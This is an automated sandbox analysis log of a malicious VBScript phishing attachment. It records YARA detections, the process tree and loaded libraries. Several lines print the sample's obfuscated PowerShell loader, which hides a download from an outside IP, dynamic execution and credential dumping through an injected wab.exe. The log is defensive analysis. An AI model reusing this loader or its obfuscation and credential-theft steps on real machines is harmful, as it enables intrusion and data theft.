Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: Payment Confirmation.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_8080.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winVBS@18/13@2/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 11_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 13_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 11_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,FindCloseChangeNotification, 11_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 11_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Renowner.Sun Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-KECL2I
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljmzlscf.af2.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7836
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8080
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.2670641426.0000000021220000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 0000000B.00000002.1849351898.0000000004BAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment Confirmation.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSot Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\lchlnulyyqrjyzicudbkfum" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wwudnmvruyjoifwgeowdizhtynh" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yyzoofgtigbtltskvyiftmucztzsei" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
